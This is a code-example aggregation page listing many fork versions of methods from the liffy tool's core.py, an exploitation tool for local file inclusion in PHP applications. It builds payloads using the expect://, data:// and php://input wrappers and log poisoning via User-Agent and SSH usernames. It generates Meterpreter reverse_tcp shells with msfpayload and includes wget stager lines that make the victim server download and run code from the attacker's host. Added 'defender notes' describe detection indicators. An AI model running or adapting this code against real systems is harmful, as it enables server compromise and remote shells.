コード例 #1
ファイル: core.py プロジェクト: rollys/liffy
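    def execute_expect(self):
        """Send one GET whose include value is an ``expect://`` command URL.

        The URL is ``self.target`` followed by ``expect://echo "<php>" | php``.
        ``<php>`` is the generated /tmp file when ``self.nostager`` is set,
        otherwise ``stager_payload`` formatted with the callback host and the
        shell name.

        Defender notes: ``expect://`` is only available when PHP's optional
        expect extension is loaded, and the request only matters where the
        parameter reaches an include without an allow-list check. The literal
        ``expect://`` in a request URL is a strong indicator in access logs.

        Exits with status 1 when the response code is not 200.
        """
        lhost, lport, shell = msf_payload()

        handle = Payload(lhost, lport, self.target, shell)
        handle.handler()

        # Build payload
        if self.nostager:
            # The context manager closes the file even if read() raises.
            with open("/tmp/{0}.php".format(shell), "r") as payload_file:
                escaped = payload_file.read().replace('"', '\\"').replace("$", "\\$")
            payload = 'expect://echo "' + quote_plus(escaped) + '" | php'
            progressbar()
        else:
            payload = 'expect://echo "' + stager_payload.format(lhost, shell) + '" | php'
            # format() is applied to the message, not to the result of print().
            print((t.red(" [!] ") + "Payload Is Located At: " + t.red("/tmp/{0}.php")).format(shell))
            print(t.green(" [*] ") + "Downloading Shell")
            progressbar()
        lfi = self.target + payload

        raw_input(t.blue(" [!] ") + "Press Enter To Continue When Your Metasploit Handler is Running ...")

        try:
            r = requests.get(lfi)
            if r.status_code != 200:
                print(t.red(" [!] Unexpected HTTP Response "))
                sys.exit(1)
        except requests.exceptions.RequestException as expect_error:
            # Append the error text instead of calling the formatted string.
            print(t.red(" [!] HTTP Error ") + str(expect_error))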
コード例 #2
ファイル: core.py プロジェクト: rollys/liffy
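    def execute_logs(self):
        """Put PHP into a logged request header, then include the log file.

        First GET: ``self.target + self.location`` with the payload as the
        ``User-Agent`` header. Second GET (only after a 200): the same URL
        without the header, so that the included log is evaluated.

        Defender notes: this depends on a web-server log that the PHP process
        can read and on an include parameter that accepts arbitrary paths.
        ``<?php`` inside a logged User-Agent (the nostager form visibly starts
        with it) is the artefact to alert on; keeping logs unreadable to the
        application user removes the precondition.
        """
        lhost, lport, shell = msf_payload()

        handle = Payload(lhost, lport, self.target, shell)
        handle.handler()

        if self.nostager:
            # The context manager closes the file even if read() raises.
            with open("/tmp/{0}.php".format(shell), "r") as payload_file:
                # The "base64" str codec is Python 2 only and wraps its output,
                # hence the newline removal.
                encoded = payload_file.read().encode("base64").replace("\n", "")
            payload = "<?php eval(base64_decode('{0}')); ?>".format(encoded)
            progressbar()
        else:
            payload = stager_payload.format(lhost, shell)
            # format() is applied to the message, not to the result of print().
            print((t.red(" [!] ") + "Payload Is Located At: " + t.red("/tmp/{0}.php")).format(shell))
            print(t.green(" [*] ") + "Downloading Shell")
            progressbar()
        lfi = self.target + self.location

        raw_input(t.blue(" [!] ") + "Press Enter To Continue When Your Metasploit Handler is Running ...")
        try:
            headers = {"User-Agent": payload}
            r = requests.get(lfi, headers=headers)
            if r.status_code != 200:
                print(t.red(" [!] Unexpected HTTP Response "))
            else:
                r = requests.get(lfi)  # pull down shell from poisoned logs
                if r.status_code != 200:
                    print(t.red(" [!] Unexpected HTTP Response "))
        except requests.exceptions.RequestException as access_error:
            # Append the error text instead of calling the formatted string.
            print(t.red(" [!] HTTP Error ") + str(access_error))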
コード例 #3
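    def execute_ssh(self):
        """Put PHP into the SSH log through the user name, then include the log.

        Runs the local ``ssh`` client against the host part of ``self.target``
        with a PHP snippet as the user name (the prompt asks for fake
        passwords so the attempts fail), then GETs
        ``self.target + self.location`` with the URL-encoded /tmp payload in
        the ``code`` query parameter.

        Defender notes: the precondition is an authentication log that the web
        application user can read, plus an include parameter that accepts
        arbitrary paths. Login attempts whose user name contains ``<?php`` are
        the log artefact to alert on.
        """
        lhost, lport, shell = msf_payload()

        handle = Payload(lhost, lport, self.target, shell)
        handle.handler()

        # The context manager closes the file even if read() raises.
        with open('/tmp/{0}.php'.format(shell), 'r') as payload_file:
            payload_stage2 = quote_plus(payload_file.read())
        payload = "<?php eval(\\$_GET['code'])?>"
        print(
            t.blue(" [!] ") +
            "Enter fake passwords to perform SSH log poisoning...")
        host = urlparse.urlsplit(self.target).netloc
        # NOTE(review): host comes from self.target and is interpolated into a
        # shell command line that runs on the operator's own machine.
        system('/usr/bin/ssh "{0}@{1}"'.format(payload, host))

        # format() is applied to the message, not to the result of print().
        print((
            t.red(" [!] ") + "Payload Is Located At: " +
            t.red("/tmp/{0}.php")).format(shell))
        print(t.green(" [*] ") + "Downloading Shell")
        progressbar()
        lfi = self.target + self.location + '&code={0}'.format(payload_stage2)

        try:
            r = requests.get(lfi)  # pull down shell from poisoned logs
            if r.status_code != 200:
                print(t.red(" [!] Unexpected HTTP Response "))
        except requests.exceptions.RequestException as access_error:
            # Append the error text instead of calling the formatted string.
            print(t.red(" [!] HTTP Error ") + str(access_error))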
コード例 #4
ファイル: core.py プロジェクト: rollys/liffy
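    def execute_ssh(self):
        """Log a PHP snippet as an SSH user name, then request the log via LFI.

        Steps visible here: read the generated /tmp payload and URL-encode it,
        run ``/usr/bin/ssh`` with the PHP snippet as user name against the
        netloc of ``self.target``, then GET ``self.target + self.location``
        with the encoded payload appended as ``&code=``.

        Defender notes: the technique needs an SSH log readable by the web
        application user and an include parameter without path restrictions.
        User names containing ``<?php`` in the authentication log, followed by
        a web request naming that log file, are the pattern to detect.
        """
        lhost, lport, shell = msf_payload()

        handle = Payload(lhost, lport, self.target, shell)
        handle.handler()

        # The context manager closes the file even if read() raises.
        with open("/tmp/{0}.php".format(shell), "r") as payload_file:
            payload_stage2 = quote_plus(payload_file.read())
        payload = "<?php eval(\\$_GET['code'])?>"
        print(t.blue(" [!] ") + "Enter fake passwords to perform SSH log poisoning...")
        host = urlparse.urlsplit(self.target).netloc
        # NOTE(review): host is derived from self.target and ends up inside a
        # shell command string executed locally.
        system('/usr/bin/ssh "{0}@{1}"'.format(payload, host))

        # format() is applied to the message, not to the result of print().
        print((t.red(" [!] ") + "Payload Is Located At: " + t.red("/tmp/{0}.php")).format(shell))
        print(t.green(" [*] ") + "Downloading Shell")
        progressbar()
        lfi = self.target + self.location + "&code={0}".format(payload_stage2)

        try:
            r = requests.get(lfi)  # pull down shell from poisoned logs
            if r.status_code != 200:
                print(t.red(" [!] Unexpected HTTP Response "))
        except requests.exceptions.RequestException as access_error:
            # Append the error text instead of calling the formatted string.
            print(t.red(" [!] HTTP Error ") + str(access_error))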
コード例 #5
ファイル: core.py プロジェクト: Yas3r/liffy
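    def execute_input(self):
        """POST PHP source to the target with ``php://input`` as include value.

        The request URL is ``self.target + "php://input"`` and the request body
        is either the generated /tmp file (``self.nostager``) or the formatted
        ``stager_payload``. Cookies from ``self.cookies`` are sent when set.

        Defender notes: ``php://input`` is only honoured by include when
        ``allow_url_include`` is enabled, so leaving that setting off and
        validating the parameter against an allow-list both block this
        request. ``php://input`` in a query string together with a POST body
        containing PHP is the pattern to alert on.

        Always terminates the process: status 0 on a 200 response, 1 otherwise.
        """
        lhost, lport, shell = msf_payload()

        # Build payload
        wrapper = "php://input"
        url = self.target + wrapper

        # Handle staging
        if self.nostager:
            # The context manager closes the file even if read() raises.
            with open("/tmp/{0}.php".format(shell), "r") as payload_file:
                payload = payload_file.read()
        else:
            payload = stager_payload.format(lhost, shell)

        handle = Payload(lhost, lport)
        handle.handler()

        if self.nostager:
            progressbar()
        else:
            print(t.cyan("[{0}] ".format(datetime.datetime.now())) + "Starting Web Server ... ")
            progressbar()
            try:
                # NOTE(review): the child handle is discarded, so nothing in
                # this method stops the helper web server afterwards.
                subprocess.Popen(['python http_server.py'], shell=True)
            except OSError as os_error:
                # Append the error text instead of calling the formatted string.
                print(t.red("[{0}] ".format(datetime.datetime.now()) + "Process Error") + " " + str(os_error))

        raw_input(t.cyan("[{0}] ".format(
            datetime.datetime.now())) + "Press Enter To Continue When Your Metasploit Handler Is Running ...")

        # Handle cookies: requests treats cookies=None like an omitted argument,
        # so one request path serves both cases.
        f_cookies = format_cookies(self.cookies) if self.cookies else None
        try:
            input_request = requests.post(url, data=payload, cookies=f_cookies)
        except requests.exceptions.RequestException as input_error:
            # RequestException also covers connection failures; requests.post
            # does not raise HTTPError on its own, so the narrower handler was
            # unreachable for the usual transport errors.
            print(t.red("[{0}] HTTP Error ".format(datetime.datetime.now())) + str(input_error))
            sys.exit(1)
        if input_request.status_code != 200:
            print(t.red("[{0}] Unexpected HTTP Response ".format(datetime.datetime.now())))
            sys.exit(1)
        sys.exit(0)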
コード例 #6
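    def execute_ssh(self):
        """Log a PHP snippet as an SSH user name, then request the log via LFI.

        After the local ``ssh`` run, the method GETs
        ``self.target + self.location + "&code=<payload>"``. When
        ``self.relative`` is set it instead tries every entry of
        ``path_traversal_sequences`` repeated 0 to 9 times in front of
        ``self.location``. Cookies from ``self.cookies`` are sent when set.

        Defender notes: the precondition is an SSH log readable by the web
        application user and an include parameter without path restrictions.
        Besides ``<?php`` in logged user names, the relative mode produces a
        burst of near-identical requests that differ only in the number of
        traversal sequences, which is easy to spot in access logs.
        """
        lhost, lport, shell = msf_payload()

        handle = Payload(lhost, lport, self.target, shell)
        handle.handler()

        # The context manager closes the file even if read() raises.
        with open('/tmp/{0}.php'.format(shell), 'r') as payload_file:
            payload_stage2 = quote_plus(payload_file.read())
        payload = "<?php eval(\\$_GET['code'])?>"
        print(t.blue(" [!] ") + "Enter fake passwords to perform SSH log poisoning ...")
        host = urlparse.urlsplit(self.target).netloc
        # NOTE(review): host comes from self.target and is interpolated into a
        # shell command line that runs on the operator's own machine.
        system('/usr/bin/ssh "{0}@{1}"'.format(payload, host))

        # format() is applied to the message, not to the result of print().
        print((t.red(" [!] ") + "Payload Is Located At: " + t.red("/tmp/{0}.php")).format(shell))
        print(t.green(" [*] ") + "Executing Shell")
        progressbar()

        # Attempt traverse
        suffix = self.location + '&code={0}'.format(payload_stage2)
        if not self.relative:
            urls = [self.target + suffix]
        else:
            urls = [
                self.target + path_traversal_sequence * counter + suffix
                for path_traversal_sequence in path_traversal_sequences
                for counter in xrange(10)
            ]

        # requests treats cookies=None like an omitted argument, so one request
        # path serves both cases. Formatting once assumes format_cookies has no
        # side effects - confirm against its definition.
        f_cookies = format_cookies(self.cookies) if self.cookies else None
        for lfi in urls:
            try:
                r = requests.get(lfi, cookies=f_cookies)
                if r.status_code != 200:
                    print(t.red(" [!] Unexpected HTTP Response "))
            except requests.exceptions.RequestException as access_error:
                # Append the error text instead of calling the formatted string.
                print(t.red(" [!] HTTP Error ") + str(access_error))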
コード例 #7
ファイル: core.py プロジェクト: olivierh59500/liffy
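    def execute_data(self):
        """Request the target with a base64 ``data://`` URL as include value.

        Prompts for the callback host and port, generates the PHP payload file
        under /tmp with ``msfpayload``, and GETs
        ``self.target + "data://text/html;base64,<encoded stager>"``. The
        handler is started only after a 200 response.

        Defender notes: ``data://`` is only honoured by include when
        ``allow_url_include`` is enabled. ``data://`` with a base64 body in a
        request parameter, followed by an outbound fetch from the web server
        to port 8000, is the pattern to alert on; egress filtering on the
        server stops the second step.
        """
        # Arguments needed for Meterpreter
        lhost = raw_input(t.green(" [*] ") + "Please Enter Host For Callbacks: ")
        lport = raw_input(t.green(" [*] ") + "Please Enter Port For Callbacks: ")

        # Generate random shell name
        g = Generator()
        shell = g.generate()

        # Build payload
        payload = "<?php system('wget http://{0}:8000/{1}.php'); ?>".format(lhost, shell)
        # The "base64" str codec is Python 2 only.
        encoded_payload = payload.encode('base64')

        # Build data wrapper
        data_wrapper = "data://text/html;base64,{0}".format(encoded_payload)
        lfi = self.target + data_wrapper

        print(t.green(" [*] ") + "Generating Data Wrapper")
        progressbar()
        print(t.red(" [!] ") + "Success!")
        print(t.green(" [*] ") + "Generating Metasploit Payload")
        progressbar()

        # msfpayload arguments
        # NOTE(review): lhost and lport are typed by the operator and go
        # unquoted into a shell=True command line; validate them or pass an
        # argument list with stdout redirected to the file.
        php = "/usr/local/share/metasploit-framework/msfpayload php/meterpreter/reverse_tcp LHOST={0} LPORT={1} R > /tmp/{2}.php".format(lhost, lport, shell)

        # Generate shell
        msf = subprocess.Popen(php, shell=True)
        msf.wait()

        # Stop when generation failed; the redirect leaves an empty or partial
        # file behind, so carrying on would only send a request for nothing.
        if msf.returncode != 0:
            print(t.red(" [!] ") + "Error Generating MSF Payload ")
            return
        print(t.red(" [!] ") + "Success! ")

        # format() is applied to the message, not to the result of print().
        print((t.red(" [!] ") + "Payload Is Located At: /tmp/{0}.php").format(shell))

        # Assuming if there is a server running on port 8000 hosting from /tmp
        print(t.red(" [!] ") + "Is Your Server Running?")
        print(t.yellow(" [*] ") + "To Launch Server: http-server /tmp -p 8000")
        print(t.green(" [*] ") + "Downloading Shell")
        progressbar()

        # The request itself sits inside the try block; outside it, the except
        # clause below could never see a transport error.
        try:
            data_request = requests.get(lfi)
            if data_request.status_code != 200:
                print(t.red(" [!] ") + "Unexpected HTTP Response ")
            else:
                handle = Payload(lhost, lport, self.target, shell)
                handle.handler()
        except requests.exceptions.RequestException as data_error:
            print(t.red(" [!] ") + "HTTP Error: %s" % data_error)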
コード例 #8
ファイル: core.py プロジェクト: Yas3r/liffy
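    def execute_expect(self):
        """Send one GET whose include value is an ``expect://`` command URL.

        The URL is ``self.target`` followed by ``expect://echo "<php>" | php``,
        with ``<php>`` taken from the generated /tmp file (``self.nostager``)
        or from the formatted ``stager_payload``. Cookies from
        ``self.cookies`` are sent when set.

        Defender notes: ``expect://`` is only available when PHP's optional
        expect extension is loaded; without it, or with an allow-list on the
        include parameter, the request has no effect. The literal
        ``expect://`` in a request URL is a strong indicator in access logs.

        Always terminates the process: status 0 on a 200 response, 1 otherwise.
        """
        lhost, lport, shell = msf_payload()

        handle = Payload(lhost, lport)
        handle.handler()

        # Build payload / handle staging
        if self.nostager:
            print(t.cyan("[{0}] ".format(datetime.datetime.now())) + "No-Staged Selected!")
            # The context manager closes the file even if read() raises.
            with open("/tmp/{0}.php".format(shell), "r") as payload_file:
                escaped = payload_file.read().replace("\"", "\\\"").replace("$", "\\$")
            payload = "expect://echo \"" + quote_plus(escaped) + "\" | php"
        else:
            payload = "expect://echo \"" + stager_payload.format(lhost, shell) + "\" | php"
            print(t.cyan("[{0}] ".format(datetime.datetime.now())) + "Starting Web Server ... ")
            progressbar()
            try:
                # NOTE(review): communicate() waits for the child to exit, so
                # this blocks for as long as http_server.py stays in the
                # foreground - confirm that is intended.
                p = subprocess.Popen(['python http_server.py'], shell=True, stdout=subprocess.PIPE)
                p.communicate()
            except OSError as os_error:
                # Append the error text instead of calling the formatted string.
                print(t.red("[{0}] ".format(datetime.datetime.now()) + "Process Error") + " " + str(os_error))

        lfi = self.target + payload

        raw_input(t.cyan("[{0}] ".format(
            datetime.datetime.now())) + "Press Enter To Continue When Your Metasploit Handler is Running ...")

        # requests treats cookies=None like an omitted argument, so one request
        # path serves both cases.
        f_cookies = format_cookies(self.cookies) if self.cookies else None
        try:
            r = requests.get(lfi, cookies=f_cookies)
        except requests.exceptions.RequestException as expect_error:
            # RequestException also covers connection failures; requests.get
            # does not raise HTTPError on its own.
            print(t.red("[{0}] HTTP Error ".format(datetime.datetime.now())) + str(expect_error))
            sys.exit(1)
        if r.status_code != 200:
            print(t.red("[{0}] Unexpected HTTP Response ".format(datetime.datetime.now())))
            sys.exit(1)
        sys.exit(0)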
コード例 #9
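    def execute_logs(self):
        """Put PHP into a logged request header, then include the log file.

        Prompts for the callback host and port, generates the PHP payload file
        under /tmp with ``msfpayload``, sends it (or a ``wget`` stager) as the
        ``User-Agent`` of a GET to ``self.target + self.location``, and after
        a 200 requests the same URL again without the header.

        Defender notes: this depends on a web-server log readable by the PHP
        process and on an include parameter that accepts arbitrary paths.
        ``<?php`` in a logged User-Agent is the artefact to alert on; log
        files unreadable to the application user remove the precondition.
        """
        # Arguments for Meterpreter
        lhost = raw_input(t.green(" [*] ") + "Please Enter Host For Callbacks: ")
        lport = raw_input(t.green(" [*] ") + "Please Enter Port For Callbacks: ")

        # Generate random shell name
        g = Generator()
        shell = g.generate()

        print(t.green(" [*] ") + "Generating Payload")
        progressbar()
        print(t.red(" [!] ") + "Success!")
        print(t.green(" [*] ") + "Generating Metasploit Payload")
        progressbar()

        # Generate PHP shell
        # NOTE(review): lhost and lport are typed by the operator and go
        # unquoted into a shell=True command line; validate them or pass an
        # argument list with stdout redirected to the file.
        php = "/usr/local/share/metasploit-framework/msfpayload php/meterpreter/reverse_tcp LHOST={0} LPORT={1} R > /tmp/{2}.php".format(lhost, lport, shell)
        msf = subprocess.Popen(php, shell=True)
        msf.wait()

        # Stop when generation failed; the redirect leaves an empty or partial
        # file behind, which the code below would otherwise read and send.
        if msf.returncode != 0:
            print(t.red(" [!] Error Generating MSF Payload "))
            return
        print(t.green(" [*] ") + "Success!")

        handle = Payload(lhost, lport, self.target, shell)
        handle.handler()

        if self.nostager:
            # The context manager closes the file even if read() raises.
            with open("/tmp/{0}.php".format(shell), "r") as payload_file:
                # The "base64" str codec is Python 2 only and wraps its output,
                # hence the newline removal.
                encoded = payload_file.read().encode('base64').replace("\n", "")
            payload = "<?php eval(base64_decode('{0}')); ?>".format(encoded)
            raw_input(t.green(" [!] ") + "Press enter to continue when your metasploit handler is running...")
        else:
            payload = "<?php system('wget http://{0}:8000/{1}.php') ?>".format(lhost, shell)
            # format() is applied to the message, not to the result of print().
            print((t.red(" [!] ") + "Payload Is Located At: " + t.red("/tmp/{0}.php")).format(shell))
            print(t.green(" [*] ") + "Downloading Shell")
            progressbar()
        lfi = self.target + self.location

        try:
            headers = {'User-Agent': payload}
            r = requests.get(lfi, headers=headers)
            if r.status_code != 200:
                print(t.red(" [!] Unexpected HTTP Response "))
            else:
                r = requests.get(lfi)  # pull down shell from poisoned logs
                if r.status_code != 200:
                    print(t.red(" [!] Unexpected HTTP Response "))
        except requests.exceptions.RequestException as expect_error:
            # Append the error text instead of calling the formatted string.
            print(t.red(" [!] HTTP Error ") + str(expect_error))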
コード例 #10
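    def execute_data(self):
        """Request the target with a base64 ``data://`` URL as include value.

        The PHP source (generated /tmp file when ``self.nostager`` is set,
        otherwise the formatted ``stager_payload``) is base64-encoded,
        URL-quoted and appended to ``self.target`` as
        ``data://text/html;base64,...``. Cookies from ``self.cookies`` are
        sent when set.

        Defender notes: ``data://`` is only honoured by include when
        ``allow_url_include`` is enabled. A request parameter holding
        ``data://`` with a base64 body is the pattern to alert on.

        Exits with status 1 when the response code is not 200.
        """
        lhost, lport, shell = msf_payload()

        # Build payload / handle staging
        if self.nostager:
            # The context manager closes the file even if read() raises.
            with open("/tmp/{0}.php".format(shell), "r") as payload_file:
                payload = payload_file.read()
        else:
            payload = stager_payload.format(lhost, shell)

        # The "base64" str codec is Python 2 only.
        encoded_payload = quote_plus(payload.encode('base64'))

        # Build data wrapper
        data_wrapper = "data://text/html;base64,{0}".format(encoded_payload)
        lfi = self.target + data_wrapper

        handle = Payload(lhost, lport, self.target, shell)
        handle.handler()

        if self.nostager:
            progressbar()
        else:
            print(t.red(" [!] ") + "Is Your Server Running?")
            print(t.yellow(" [*] ") + "To Launch Server: http-server /tmp -p 8000")
            print(t.green(" [*] ") + "Downloading Shell")
            progressbar()

        raw_input(t.blue(" [!] ") + "Press Enter To Continue When Your Metasploit Handler is Running ...")

        # requests treats cookies=None like an omitted argument, so one request
        # path serves both cases.
        f_cookies = format_cookies(self.cookies) if self.cookies else None
        try:
            data_request = requests.get(lfi, cookies=f_cookies)
            if data_request.status_code != 200:
                print(t.red(" [!] ") + "Unexpected HTTP Response ")
                sys.exit(1)
        except requests.exceptions.RequestException as data_error:
            # Append the error text instead of calling the value print() returns.
            print(t.red(" [!] ") + "HTTP Error " + str(data_error))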
コード例 #11
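    def execute_expect(self):
        """Send one GET whose include value is an ``expect://`` command URL.

        Prompts for the callback host and port, generates the PHP payload file
        under /tmp with ``msfpayload``, then requests ``self.target`` followed
        by either ``expect://echo "<php>" | php`` (``self.nostager``) or an
        ``expect://wget`` URL pointing at port 8000 of the callback host.

        Defender notes: ``expect://`` is only available when PHP's optional
        expect extension is loaded; without it, or with an allow-list on the
        include parameter, the request has no effect. The literal
        ``expect://`` in a request URL is a strong indicator in access logs,
        and egress filtering on the web server stops the staged download.
        """
        # Arguments for Meterpreter
        lhost = raw_input(t.green(" [*] ") + "Please Enter Host For Callbacks: ")
        lport = raw_input(t.green(" [*] ") + "Please Enter Port For Callbacks: ")

        # Generate random shell name
        g = Generator()
        shell = g.generate()

        print(t.green(" [*] ") + "Generating Payload")
        progressbar()
        print(t.red(" [!] ") + "Success!")
        print(t.green(" [*] ") + "Generating Metasploit Payload")
        progressbar()

        # Generate PHP shell
        # NOTE(review): lhost and lport are typed by the operator and go
        # unquoted into a shell=True command line; validate them or pass an
        # argument list with stdout redirected to the file.
        php = "/usr/local/share/metasploit-framework/msfpayload php/meterpreter/reverse_tcp LHOST={0} LPORT={1} R > /tmp/{2}.php".format(lhost, lport, shell)
        msf = subprocess.Popen(php, shell=True)
        msf.wait()

        # Stop when generation failed; the redirect leaves an empty or partial
        # file behind, which the code below would otherwise read and send.
        if msf.returncode != 0:
            print(t.red(" [!] Error Generating MSF Payload "))
            return
        print(t.green(" [*] ") + "Success!")

        handle = Payload(lhost, lport, self.target, shell)
        handle.handler()

        # Build payload
        if self.nostager:
            # The context manager closes the file even if read() raises.
            with open("/tmp/{0}.php".format(shell), "r") as payload_file:
                escaped = payload_file.read().replace("\"", "\\\"").replace("$", "\\$")
            payload = "expect://echo \"" + quote_plus(escaped) + "\" | php"
            raw_input(t.green(" [!] ") + "Press enter to continue when your metasploit handler is running...")
        else:
            payload = "expect://wget http://{0}:8000/{1}.php".format(lhost, shell)
            # format() is applied to the message, not to the result of print().
            print((t.red(" [!] ") + "Payload Is Located At: " + t.red("/tmp/{0}.php")).format(shell))
            print(t.green(" [*] ") + "Downloading Shell")
            progressbar()
        lfi = self.target + payload

        try:
            r = requests.get(lfi)
            if r.status_code != 200:
                print(t.red(" [!] Unexpected HTTP Response "))
        except requests.exceptions.RequestException as expect_error:
            # Append the error text instead of calling the formatted string.
            print(t.red(" [!] HTTP Error ") + str(expect_error))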
コード例 #12
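    def execute_input(self):
        """POST PHP source to the target with ``php://input`` as include value.

        The request URL is ``self.target + "php://input"``; the body is the
        generated /tmp file (``self.nostager``) or the formatted
        ``stager_payload``. Cookies from ``self.cookies`` are sent when set.

        Defender notes: ``php://input`` is only honoured by include when
        ``allow_url_include`` is enabled. ``php://input`` in a query string
        combined with a POST body containing PHP is the pattern to alert on.

        Exits with status 1 when the response code is not 200.
        """
        lhost, lport, shell = msf_payload()

        # Build payload
        wrapper = "php://input"
        url = self.target + wrapper

        # Handle staging
        if self.nostager:
            # The context manager closes the file even if read() raises.
            with open("/tmp/{0}.php".format(shell), "r") as payload_file:
                payload = payload_file.read()
        else:
            payload = stager_payload.format(lhost, shell)

        handle = Payload(lhost, lport, self.target, shell)
        handle.handler()

        if self.nostager:
            progressbar()
        else:
            print(t.red(" [!] ") + "Is Your Server Running?")
            print(t.yellow(" [*] ") + "To Launch Server: http-server /tmp -p 8000")
            print(t.green(" [*] ") + "Downloading Shell")
            progressbar()

        raw_input(t.blue(" [!] ") + "Press Enter To Continue When Your Metasploit Handler Is Running ...")

        # Handle cookies: requests treats cookies=None like an omitted argument,
        # so one request path serves both cases.
        f_cookies = format_cookies(self.cookies) if self.cookies else None
        try:
            input_request = requests.post(url, data=payload, cookies=f_cookies)
            if input_request.status_code != 200:
                print(t.red(" [*] Unexpected HTTP Response "))
                sys.exit(1)
        except requests.exceptions.RequestException as input_error:
            # Append the error text instead of calling the formatted string.
            print(t.red(" [*] HTTP Error ") + str(input_error))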
コード例 #13
ファイル: core.py プロジェクト: olivierh59500/liffy
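    def execute_input(self):
        """POST PHP source to the target with ``php://input`` as include value.

        Prompts for the callback host and port, generates the PHP payload file
        under /tmp with ``msfpayload``, and POSTs a ``wget`` stager to
        ``self.target + "php://input"``. The handler is started only after a
        200 response.

        Defender notes: ``php://input`` is only honoured by include when
        ``allow_url_include`` is enabled. ``php://input`` in a query string
        combined with a POST body containing PHP is the pattern to alert on;
        egress filtering on the web server stops the staged download.
        """
        # Arguments needed for Meterpreter
        lhost = raw_input(t.green(" [*] ") + "Please Enter Host For Callbacks: ")
        lport = raw_input(t.green(" [*] ") + "Please Enter Port For Callbacks: ")

        # Generate random shell name
        g = Generator()
        shell = g.generate()

        # Build php payload
        wrapper = "php://input"
        url = self.target + wrapper
        # NOTE(review): only the shell name is substituted here; the "%s" is
        # sent literally and lhost is not used in this string.
        payload = "<?php system('wget http://%s:8000/{0}.php'); ?>".format(shell)

        print(t.green(" [*] ") + "Generating Data Wrapper")
        progressbar()
        print(t.red(" [!] ") + "Success!")
        print(t.green(" [*] ") + "Generating Metasploit Payload")
        progressbar()

        # Generate PHP shell
        # NOTE(review): lhost and lport are typed by the operator and go
        # unquoted into a shell=True command line; validate them or pass an
        # argument list with stdout redirected to the file.
        php = "/usr/local/share/metasploit-framework/msfpayload php/meterpreter/reverse_tcp LHOST={0} LPORT={1} R > /tmp/{2}.php".format(lhost, lport, shell)
        msf = subprocess.Popen(php, shell=True)
        msf.wait()

        # Stop when generation failed instead of carrying on with an empty or
        # partial file.
        if msf.returncode != 0:
            print(t.red(" [!] Error Generating MSF Payload "))
            return
        print(t.green(" [*] ") + "Success!")

        # format() is applied to the message, not to the result of print().
        print((t.red(" [!] ") + "Payload Is Located At: " + t.red("/tmp/{0}.php")).format(shell))
        print(t.green(" [*] ") + "Downloading Shell")
        progressbar()

        # Try block for the request
        try:
            dr = requests.post(url, data=payload)
            if dr.status_code != 200:
                print(t.red(" [*] Unexpected HTTP Response "))
            else:
                handle = Payload(lhost, lport, self.target, shell)
                handle.handler()
        except requests.exceptions.RequestException as input_error:
            print(t.red(" [*] HTTP Error ") + str(input_error))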
コード例 #14
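    def execute_data(self):
        """Request the target with a base64 ``data://`` URL as include value.

        The PHP source (generated /tmp file when ``self.nostager`` is set,
        otherwise the formatted ``stager_payload``) is base64-encoded,
        URL-quoted and appended to ``self.target`` as
        ``data://text/html;base64,...``.

        Defender notes: ``data://`` is only honoured by include when
        ``allow_url_include`` is enabled. A request parameter holding
        ``data://`` with a base64 body is the pattern to alert on.

        Exits with status 1 when the response code is not 200.
        """
        lhost, lport, shell = msf_payload()

        # Build payload
        if self.nostager:
            # The context manager closes the file even if read() raises.
            with open("/tmp/{0}.php".format(shell), "r") as payload_file:
                payload = payload_file.read()
        else:
            payload = stager_payload.format(lhost, shell)

        # The "base64" str codec is Python 2 only.
        encoded_payload = quote_plus(payload.encode('base64'))

        # Build data wrapper
        data_wrapper = "data://text/html;base64,{0}".format(encoded_payload)
        lfi = self.target + data_wrapper

        handle = Payload(lhost, lport, self.target, shell)
        handle.handler()

        if self.nostager:
            progressbar()
        else:
            # Assuming if there is a server running on port 8000 hosting from /tmp
            print(t.red(" [!] ") + "Is Your Server Running?")
            print(
                t.yellow(" [*] ") +
                "To Launch Server: http-server /tmp -p 8000")
            print(t.green(" [*] ") + "Downloading Shell")
            progressbar()

        raw_input(
            t.blue(" [!] ") +
            "Press Enter To Continue When Your Metasploit Handler is Running ..."
        )

        # The request itself sits inside the try block; outside it, the except
        # clause below could never see a transport error.
        try:
            data_request = requests.get(lfi)
            if data_request.status_code != 200:
                print(t.red(" [!] ") + "Unexpected HTTP Response ")
                sys.exit(1)
        except requests.exceptions.RequestException as data_error:
            # Append the error text instead of calling the value print() returns.
            print(t.red(" [!] ") + "HTTP Error " + str(data_error))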
コード例 #15
ファイル: core.py プロジェクト: olivierh59500/liffy
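    def execute_expect(self):
        """Send one GET whose include value is an ``expect://wget`` URL.

        Prompts for the callback host and port, generates the PHP payload file
        under /tmp with ``msfpayload``, and requests ``self.target`` followed
        by ``expect://wget http://<host>:8000/<shell>.php``. The handler is
        started only after a 200 response.

        Defender notes: ``expect://`` is only available when PHP's optional
        expect extension is loaded; without it, or with an allow-list on the
        include parameter, the request has no effect. The literal
        ``expect://`` in a request URL is a strong indicator in access logs,
        and egress filtering on the web server stops the download.
        """
        # Arguments for Meterpreter
        lhost = raw_input(t.green(" [*] ") + "Please Enter Host For Callbacks: ")
        lport = raw_input(t.green(" [*] ") + "Please Enter Port For Callbacks: ")

        # Generate random shell name
        g = Generator()
        shell = g.generate()

        # Build payload
        payload = "expect://wget http://{0}:8000/{1}.php".format(lhost, shell)
        lfi = self.target + payload

        print(t.green(" [*] ") + "Generating Payload")
        progressbar()
        print(t.red(" [!] ") + "Success!")
        print(t.green(" [*] ") + "Generating Metasploit Payload")
        progressbar()

        # Generate PHP shell
        # NOTE(review): lhost and lport are typed by the operator and go
        # unquoted into a shell=True command line; validate them or pass an
        # argument list with stdout redirected to the file.
        php = "/usr/local/share/metasploit-framework/msfpayload php/meterpreter/reverse_tcp LHOST={0} LPORT={1} R > /tmp/{2}.php".format(lhost, lport, shell)
        msf = subprocess.Popen(php, shell=True)
        msf.wait()

        # Stop when generation failed instead of carrying on with an empty or
        # partial file.
        if msf.returncode != 0:
            print(t.red(" [!] Error Generating MSF Payload "))
            return
        print(t.green(" [*] ") + "Success!")

        # format() is applied to the message, not to the result of print().
        print((t.red(" [!] ") + "Payload Is Located At: " + t.red("/tmp/{0}.php")).format(shell))
        print(t.green(" [*] ") + "Downloading Shell")
        progressbar()

        # The request itself sits inside the try block; outside it, the except
        # clause below could never see a transport error.
        try:
            ir = requests.get(lfi)
            if ir.status_code != 200:
                print(t.red(" [!] Unexpected HTTP Response "))
            else:
                handle = Payload(lhost, lport, self.target, shell)
                handle.handler()
        except requests.exceptions.RequestException as expect_error:
            # Append the error text instead of calling the formatted string.
            print(t.red(" [!] HTTP Error ") + str(expect_error))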
コード例 #16
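    def execute_input(self):
        """POST PHP source to the target with ``php://input`` as include value.

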